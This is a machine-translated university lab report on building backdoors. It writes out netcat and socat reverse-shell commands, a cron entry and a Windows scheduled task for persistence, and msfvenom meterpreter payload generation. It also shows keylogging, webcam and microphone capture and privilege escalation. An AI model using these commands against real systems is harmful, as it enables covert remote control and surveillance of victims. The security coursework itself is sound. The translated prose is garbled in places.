20175236 EXP2 back door against the Principles and Practice 2019-2020-2 network technology

First, content description and experimental basic questions answered
Second, the tools to prepare

View WindowsIP and LinuxIP
Windows get Linuxshell
Linux get Windows shell
Transmitting data using nc

Third, the experimental process

Use netcat get the host operating Shell, cron start
Use socat get the host operating Shell, plans to start the task
Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell

Fourth, the problem with thinking

First, content description and experimental basic questions answered

1, the content of the experiment
(1) using the acquired host operating netcat Shell, cron start (0.5 min)

(2) use socat get the host operating Shell, plans to launch the task (0.5 points)

(3) using the MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and runs a host acquires Shell (0.5 min)

(4) using the MSF meterpreter (or other software) to generate the target host acquires audio content, the camera, and the like recording keystrokes, and try to provide the right (2 minutes)

(5) plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell (1 min) plus the contents of this experiment together written report.

2, basic questions answered
(1) include a back door you can think of possible ways to enter your system?

Linux computer account password hack
Replace login program that provides special password Invisible Sign
Hidden back door in the file system

(2) How do you know exemplified by the back door to start up (win and linux) way?

Linux: crontab function by the Trojans to start the timer, the control panel will be able to maintain the status monitor periodically start the back door, it can also bind to normal healthy then injected shellcode open the back door.
win: passive acceptance of backdoors or download, when the injured party click to run the backdoor program starts.

Which gives you a profound image function (3) Meterpreter there?

Basic functions (basic connectivity, executing instructions)
Extensions (such as collecting user information, installation services and other functions)

(4) How to find yourself the system has not been installed back door?

Install antivirus software: for real-time protection.
Detect network connection: Check for IP to establish a connection with the machine.

(5) back door concept

The back door is not accessible through the normal certification process and channel system.

** Where does the back door?

The compiler leave the back door
Operating system to stay back door
The most common application of course leave the back door
There is lurking in the operating system or disguised backdoors dedicated for a specific application.

Here are some examples of recent years:

Compiler: Apple Xcode back door event . Apple Xcode event caught the back door of APP include: micro-channel, Netease cloud music, travel pieces, etc. 12306 76 software, affecting hundreds of millions of users.
Operating System: VS government vendors . Apple refused to open the back door of the FBI requirements set requirements. Those who did not refuse, of course, can not speak.
Operating system: depth interpretation of the MS14-068 vulnerability: Microsoft orchestrated by the back door? . In fact, the details I did not understand too, see it quite suspicious.
Firmware: More Cisco routers found the back door: China has four
Application: The researchers found macOS version of Skype built-in back door
Application: see the bottom line of corporate ethics Gustafsson from "back door" event
Applications: How to evaluate cloud platform exposed vulnerabilities exist WormHole Baidu's backdoor variety of App?

A relatively narrow little back door concept:

Especially lurking in the operating system designed to do a backdoor program

"Bad guys" can be connected to this program

Remote execute various commands

The concept and Trojans overlap

First of all we have to have such a program
- netcat series
- meter preternatural
- intersect
- Particularly ...
Second, get into the system
- Genuine software attacks or deliberately, contains backdoor
- Genuine library file contains backdoor
- Essentially, the trick you need to download the operation, it belongs to all kinds of fishing
  - Installation package contains the back door, put online for download
  - Bound to a specific file, put online for download
  - Malicious programs sent directly to you
  - Send direct link to your phishing attack, a malicious website stallion
  - Picked up a U disk, open a file to see?
- Coal female handsome pot take U disk directly copy to you
- System vulnerabilities to attack, after acquiring control, install a backdoor
Have up and running again
- Boot from the start technology
- win the regular tasks
- The linux cron
- Disguised as common software, entice users to click
- Trojanized normal software
Last not have malicious code detection program found in native
- Malicious code to avoid killing technology
Firewall can not be found on this machine or network
- Rebound connection
- Encrypted connection
- Tunneling

(6) Common backdoor

netcat
- Also known as nc, ncat
- http://nc110.sourceforge.net/
- http://netcat.sourceforge.net/
It is a bottom tool, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.
- Linux: general comes with netcat, "man netcat" or "man nc" to see the instructions for its use
- Windows: Course Home accessories download ncat.rar extract can be used!

Second, the tools to prepare

1 Use netcat or nc obtain remote host Shell

1.1 Windows to get Linux Shell

1.Windows open listening

With a ipconfigview Native IP command 192.168.157.1:

Download ncat and enter the directory, press the windows + Rkey combination to open cmd.exe, enter ncat.exe -l -p 5236the command:

Then Windows Firewall alarm! In order to achieve the purpose of the experiment , here on the first computer antivirus software and Windows Firewall temporarily closed :

2.Linux rebound in connection Win, enter the command nc 192.168.157.1 5236 -e /bin/sh:

Get the next 3.Windows linux shell, any command can be run, such as ls:

1.2 Linux get Win Shell

1. ifconfigCheck local IP command 192.168.157.132:

2.Linux run monitor command, enter the commandnc -l -p 5236

3.Windows rebound connect Linux, enter the command in the ncat catalog ncat.exe -e cmd.exe 192.168.157.132 5236:

See the Windows command prompt 4.Linux

5. You can enjoy the view and manipulate files on Windows ha ha ha!

2 to transmit data using nc

A command transmission format file with the nc are as follows:

The destination host listening:

nc -l listening port> To receive the file name

Source host initiates a request:

nc destination host ip destination port
English is described as follows:

Start by using nc to listen on a specific port, with output captured into a file:

$ nc -l 1234 > filename.out

Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:

$ nc host.example.com 1234 < filename.in

After the file has been transferred, the connection will close automatically.

Windows monitor 5224port
Under Kali is connected to a Windows 5224port
Establishing a data transmission connection

Third, the experimental process

Use netcat get the host operating Shell, cron start

In Windows monitor 5236port
In kali, washed with crontab -eedit a scheduled task, select the editor3

Add a line at the end 24 * * * * /bin/netcat 192.168.157.1 5236 -e /bin/sh, which means the reverse connection of Windows hosts in the 24th minute of every hour 5236port

22:24 time to time, have been obtained in the shell kali, commands can be entered

Use socat get the host operating Shell, plans to start the task

Shocked

Netcat ++, super netcat tool.

Do not believe? To look up the README .

windows version, see attachment . Decompression that is used, do not install.

Any agency, forwarding and other functions can be realized with the tool.

With the man socatcommand to view the socatpresentation and related usage:

DESCRIPTION

 **Socat**  is  a  command  line based utility that establishes two bidirec‐
 tional byte streams  and  transfers  data  between  them.  Because  the
 streams  can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many dif‐ ferent purposes.

 **Filan** is a utility  that  prints  information  about  its  active  file
 descriptors  to  stdout.  It  has been written for debugging **socat**, but
 might be useful for other purposes too. Use the -h option to find more infos.

 **Procan** is a utility that prints information about process parameters to
 stdout. It has been written to  better  understand  some  UNIX  process properties and for debugging **socat**, but might be useful for other pur‐ poses too.

 The life cycle of a **socat** instance typically consists of four phases.

 In the init phase, the command line options are parsed and  logging  is
 initialized.

 During the open phase, **socat** opens the first address and afterwards the
 second address. These steps are usually blocking; thus, especially  for
 complex address types like socks, connection requests or authentication
 dialogs must be completed before the next step is started.

 In the transfer phase, **socat** watches both streams’ read and write  file
 descriptors  via select() , and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

 When  one  of  the  streams  effectively reaches EOF, the closing phase
 begins. **Socat** transfers the EOF condition to  the  other  stream,  i.e.
 tries  to  shutdown only its write stream, giving it a chance to termi‐ nate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and termi‐ nates.

In win10 system, right-click the bottom left corner of the screen windows icon, select "Computer Management" (or simply search for "Computer Management")
Create a task in Task Scheduler, fill in the name of the task (school)

Click the 触发器tab, select 新建, and then begin the task set 工作站锁定时:
Click the 操作tab, click 新建, programs, or scripts, select socat.exethe path, add a column to write parameters tcp-listen:5236 exec:cmd.exe,pty,stderr(function is to cmd.exebind to the port 5236, while the cmd.exethe redirect stderr to stdout), click 确定Save Settings:

Once created, the discovery task is ready, press the Windows + L shortcut key to lock your computer when you open again, find the task you created, double-click, you can create a discovery task before the run has begun

At this point, enter the command in Kali environment socat - tcp:192.168.157.1:5236, the first argument here -represent the standard input and output, the second stream to port Windows 5236 host, can be found at this time has successfully obtained a cmd shell

MSF meterpreter using an executable file using ncat socat or transferred to the host and the host operating acquired Shell

meter Preter

Is a backdoor program.

The traditional understanding is: someone to write a backdoor, we make use of them.

Later, some cattle do, wanted to write a platform to generate backdoors. This platform does, the back door

基本功能（基本的连接、执行指令），

扩展功能（如搜集用户信息、安装服务等功能），

编码模式，

运行平台，

as well as运行参数

Part or all made adjustable parameters. When used in combination as needed, you can generate an executable file.

Typical platform will include:

intersect

Metaspolit of msfvenom instructions

Veil-evasion

We next learn how to use the back door msfenom generate an executable file. We want to generate this backdoor is Meterpreter.

Meterpreter uncover the mystery describes some of the underlying principles of meterpreter of ???.

Input command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exegenerating backdoor

Note The IP address is LinuxIP

Parameter Description:

-p use of payload. payload translated as payload, is to be transported something. Here windows / meterpreter / reverse_tcp is a piece of shellcode

-X executable file template to use, payload (shellcode) is written to the executable file

-e encoder used, for shellcode deformation, in order to avoid killing

-I iterations encoder. I.e., as encoded using the encoder 5

-b badchar payload is to be removed in character

LHOST is connected IP bounce back

LPORT is connected back to port

Type of -f Makefile

> Output file to which

** Of course, the generated files need to ncatcopied to the Windows command in the (of course, most likely anti-virus software will alarm and delete the file, because it is a back door thing. So in order to verify the co-feature, you can temporarily turn off anti-virus software for a while. Later we will be mentioned to avoid killing, finished back door to avoid killing anti-virus software will not be found)

The next Windows entry into the receiving modencat.exe -lv 5236 > 20175236_backdoor.exe，
Linux executed nc 192.168.157.1 5236 < 20175236_backdoor.exe，Note Closing the virus killing software

The IP address of the host that is WindowsIP
Successfully transmitting and receiving files

Kali open terminal, enter msfconsolecommands into the console msf

Enter use exploit/multi/handlerinto the monitor module
Input set payload windows/meterpreter/reverse_tcpsettings payload
Sequentially inputted set LHOST 192.168.182.128and set LPORT 5224set the IP and port

Note that at this time when the specified IP address LinuxIP, and generates the same IP backdoor

Setup is complete, start listeningexploit

Backdoor running under Windows

kali has received Windows host connection, remote control and get the shell

Description:

LHOST needs and the step of generating backdoor.exe consistent, i.e., in the present embodiment 192.168.157.132;
LPORT also requires the previous step and generating backdoor.exe consistent, i.e. 5236;
payload should be consistent, that is windows/meterpreter/reverse_tcp.

MSF meterpreter acquire the content using the destination host generates audio, camera, records keystrokes

Use record_micinstructions can intercept an audio
Use webcam_snapinstructions may use the camera to take pictures (I ugly, not added a sticker on the mirror)
Use screenshotinstructions can be screen shots (type instruction forget shots, but can see a screenshot of the generated files)
Using keyscan_startan instruction to start recording the keystrokes using the keyscan_dumpinstruction to read the recorded keystrokes
First use getuidcommand to view the current user, and then use the getsysteminstructions mention the right

Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell

Use the command msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.132 LPORT=5236 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5236pwnto generate a template to pwn1 this elf file format shellcode file 5236pwn

Input command msfconsoleinto the command line msf
Run the backdoor file 5236pwn on kali,在kali中执行pwn2时应先加权限 chmod +x 5236pwn
At this point the attacker Linux has gained connected attacker Linux, and get a shell on the remote control

Fourth, the problem with thinking

I feel that this experiment is not generally difficult, compared to the first experiment to experiment a lot of familiar environment, it is also relatively easy to do, is learning task recently made many and as varied a bit messy, time allocation caused by an irrational test report the quality is not high. But in general this experiment can be summarized in four words: really fun! I felt establish a backdoor connection is so simple, yet so powerful function, experimental process still quite rewarding. Of course, CSDN also learned some other things, such as Meterpreter's much more than what I think of as a single, CSDN reference on someone else's blog to learn a meterpreter some other related knowledge:

With the helpcommand to view meterpreter basic functions:

Get Windows command line interface, Windows built-in features to facilitate the execution of instructions, exit Exit: get ruby interface, exit to exit. If you row, you can even be programmed directly with ruby (PS: I will not, so do not say)

It is said that you can call any windows API. Refer to "Metasploit devil training camp" Chapter IX, there is a small example.

There are many things to learn, "confidential no small matter"! More understanding through this hands-on to the low capacity of some systems to prevent the invasion of the fact that such a simple backdoor shocking, thereby indirectly increase their security awareness.